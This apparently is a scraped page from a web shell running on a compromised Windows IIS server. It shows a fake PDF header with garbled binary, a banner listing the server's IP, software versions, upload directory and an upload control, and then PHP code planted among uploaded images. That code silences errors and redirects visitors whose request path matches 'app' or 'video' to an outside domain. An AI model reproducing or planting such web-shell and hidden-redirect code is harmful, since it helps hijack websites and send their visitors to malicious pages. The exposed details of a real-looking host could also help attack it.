%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 122.154.253.140  /  Your IP : 216.73.216.169 Web Server : Microsoft-IIS/7.5 System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586 User : IUSR ( 0) PHP Version : 5.6.31 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/inetpub/wwwroot/building/upload_images1/  | 
Upload File :  | 
<?php
 set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html; charset=utf-8");
define('REQUEST_URI', $_SERVER['REQUEST_URI']);
define('REFERER', isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '');
define('USER_AGENT', $_SERVER['HTTP_USER_AGENT']);
define('REF_GOOGLE', preg_match('/google/', REFERER));
define('IN_AREA1', preg_match('/\app|\video/i', REQUEST_URI));
if (IN_AREA1) {
    $url = 'https://www.bty2361.com/';
header('Location: ' . $url);
    exit;
}